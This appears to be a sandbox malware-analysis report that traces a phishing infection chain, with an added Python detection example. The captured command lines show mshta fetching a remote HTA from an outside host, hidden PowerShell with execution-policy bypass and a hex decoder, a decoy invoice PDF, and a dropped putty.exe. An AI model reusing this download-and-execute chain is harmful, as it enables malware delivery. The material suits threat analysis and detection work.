Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1944
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1600
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5378
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4301
Source: C:\Windows\System32\mshta.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\invoiceupsstage[1]
Source: C:\Users\user\AppData\Roaming\putty.exe | Evaded block: after key decision (graph_12-88466)
Source: C:\Users\user\AppData\Roaming\putty.exe | Evaded block: after key decision (graph_12-89402)
Source: C:\Users\user\AppData\Roaming\putty.exe | Evaded block: after key decision (graph_12-89537)
Source: C:\Users\user\AppData\Roaming\putty.exe | API coverage: 4.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4248 | Thread sleep count: 1944 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5336 | Thread sleep count: 1600 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5868 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3700 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3148 | Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678633F40 FindFirstFileA,FindClose
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678626B00 GetProcAddress,FindFirstFileA,CloseHandle
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678632190 FindFirstFileA,FindClose,FindWindowA
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678600520 GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: powershell.exe, 00000007.00000002.1772670631.000001FB69A54000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWMG%SystemRoot%\system32\mswsock.dllring($TRZjYlWGC);$uIvTQuuE.Dispose();&$xbgxJDMGJ.Substring(0,3)$xbgxJDMGJ.Substring(3)M
Source: mshta.exe, 00000004.00000002.1793264894.0000023F9A0F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} I
Source: mshta.exe, 00000004.00000003.1782232696.000002379763A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.000002379763A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790203146.0000023797681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792575197.0000023797681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.00000237975FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1782232696.0000023797681000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2768031375.00000253D2227000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2769230455.00000253D7856000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000007.00000002.1772670631.000001FB69AA7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000007.00000002.1770606726.000001FB69820000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Y
Source: putty.exe, 0000000C.00000002.2767022134.0000022102F9C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786AB7AC IsDebuggerPresent,OutputDebugStringW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (2 identical entries)
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67868AC78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786A4664 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FwbFg($aDSKbaK){return -split ($aDSKbaK -replace '..', '0x$& ')};$JMNVEMgx = FwbFg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fcuYB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\upsinvoice.pdf"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\putty.exe "C:\Users\user\AppData\Roaming\putty.exe"
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function fwbfg($adskbak){return -split ($adskbak -replace '..', '0x$& ')};$jmnvemgx = fwbfg('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');$fcuyb (2 identical entries)
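The process chain in the entries above (powershell.exe launching mshta.exe with a remote URL, mshta.exe launching powershell.exe with `-ep Unrestricted -nop` and an inline hex-string decoder, and that PowerShell opening a decoy PDF in Acrobat while starting putty.exe from the user's Roaming profile) is the part of this report a detection engineer would turn into a rule. The Python below is an added example, not part of the Joe Sandbox report: it re-implements the `FwbFg` decoder exactly as it appears in the command line so its effect on a hex string can be seen, and runs a parent/child check over constructed process-creation events shaped like the chain. The PIDs, the first stage's command line and the `4d5a9000` hex argument are assumptions (the real payload string is elided on the page), and the final cast of the `0xHH` tokens to bytes is inferred, since that part of the command line is not shown.

```python
import re
from dataclasses import dataclass

# Mirror of the PowerShell hex decoder in the mshta-spawned command line:
#   function FwbFg($aDSKbaK){return -split ($aDSKbaK -replace '..', '0x$& ')}
# '-replace' rewrites every two characters as "0xHH " and unary '-split' turns the
# result into a string array. The later cast to bytes is elided on the page, so
# int(tok, 16) below is an assumed equivalent of that missing step.
HEX_PAIR = re.compile(r"..")


def powershell_hex_split(s: str) -> list[str]:
    """Equivalent of: -split ($s -replace '..', '0x$& ')"""
    return HEX_PAIR.sub(lambda m: "0x" + m.group(0) + " ", s).split()


def decode_hex_payload(s: str) -> bytes:
    return bytes(int(tok, 16) for tok in powershell_hex_split(s))


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon EID 1 / 4688 shape), constructed."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Patterns for the tradecraft visible in the report's process chain.
REMOTE_HTA = re.compile(r'mshta(\.exe)?"?\s+"?https?://', re.I)
PS_BYPASS = re.compile(r"-(ep|executionpolicy)\s+unrestricted|-nop\b|-w(indowstyle)?\s+1\b", re.I)
HEX_DECODER = re.compile(r"-replace\s+'\.\.'\s*,\s*'0x\$&\s*'", re.I)
USER_WRITABLE = re.compile(r"\\AppData\\(Roaming|Local)\\", re.I)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Return (pid, reason) pairs for events matching the LNK -> mshta -> PowerShell -> payload chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        parent_name = image_name(parent.image) if parent else ""
        name = image_name(e.image)
        if name == "mshta.exe" and REMOTE_HTA.search(e.cmdline):
            findings.append((e.pid, "mshta loading a remote HTA"))
        if name == "powershell.exe" and parent_name == "mshta.exe":
            findings.append((e.pid, "powershell spawned by mshta"))
        if name == "powershell.exe" and PS_BYPASS.search(e.cmdline) and HEX_DECODER.search(e.cmdline):
            findings.append((e.pid, "powershell hex-string decoder with execution-policy bypass"))
        if parent_name == "powershell.exe" and USER_WRITABLE.search(e.image):
            findings.append((e.pid, "powershell launched an executable from the user profile"))
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events mirroring the chain in the report. PIDs are made up, the first
# stage's command line is a placeholder (the LNK's own command line is not on the page),
# and the hex argument '4d5a9000' stands in for the payload string the report elides.
SAMPLE_EVENTS = [
    ProcEvent(10, 1, PS, f'"{PS}" -w 1'),
    ProcEvent(20, 10, r"C:\Windows\System32\mshta.exe",
              r'"C:\Windows\system32\mshta.exe" https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage'),
    ProcEvent(30, 20, PS,
              f'"{PS}" -w 1 -ep Unrestricted -nop function FwbFg($aDSKbaK)'
              "{return -split ($aDSKbaK -replace '..', '0x$& ')};$JMNVEMgx = FwbFg('4d5a9000')"),
    ProcEvent(40, 30, r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
              r'"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\upsinvoice.pdf"'),
    ProcEvent(50, 30, r"C:\Users\user\AppData\Roaming\putty.exe", r'"C:\Users\user\AppData\Roaming\putty.exe"'),
]

if __name__ == "__main__":
    print(decode_hex_payload("4d5a9000"))
    for pid, reason in detect(SAMPLE_EVENTS):
        print(pid, reason)
```

The decoy Acrobat launch (event 40) produces no finding on purpose: it runs a signed binary from Program Files, and only the parent/child and command-line properties, not the opened PDF, are examined. Running the block on the constructed events yields four findings, all on the mshta, second-stage PowerShell and putty.exe records.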
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678617130 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorDacl,GetLastError,LocalFree,LocalFree
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678617350 AllocateAndInitializeSid,AllocateAndInitializeSid,GetLastError,GetLastError,GetLastError
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785D53E3 MonitorFromWindow,GetMonitorInfoA,GetDesktopWindow,GetClientRect,CreateWindowExW,GetLastError,MonitorFromWindow,MonitorFromWindow,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetWindowRect,GetClientRect,SetWindowPos,CreateBitmap,CreateCaret,SetScrollInfo,GetDoubleClickTime,GetSystemMenu,CreatePopupMenu,AppendMenuA,AppendMenuA,AppendMenuA,CreateMenu,DeleteMenu,DeleteMenu,AppendMenuA,AppendMenuA,GetKeyboardLayout,GetLocaleInfoA,ShowWindow,SetForegroundWindow,GetForegroundWindow,UpdateWindow,MsgWaitForMultipleObjects,PeekMessageW,IsWindow,DispatchMessageW,IsDialogMessageA,PeekMessageA,GetForegroundWindow,MsgWaitForMultipleObjects,DispatchMessageW,PeekMessageW,IsWindow,IsDialogMessageA
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786A9A14 EnumSystemLocalesW
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785D1B9F GetLocaleInfoA,DefWindowProcW
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786A9D30 EnumSystemLocalesW
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786A9FB8 GetLocaleInfoW,GetLocaleInfoW,GetACP
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786A9714 EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786A2EDC EnumSystemLocalesW
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786A23A8 GetLocaleInfoW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation (2 identical entries)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation (4 identical entries)
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67867B500 CreateNamedPipeA,CreateEventA,GetLastError,12_2_00007FF67867B500
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67868B168 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_00007FF67868B168
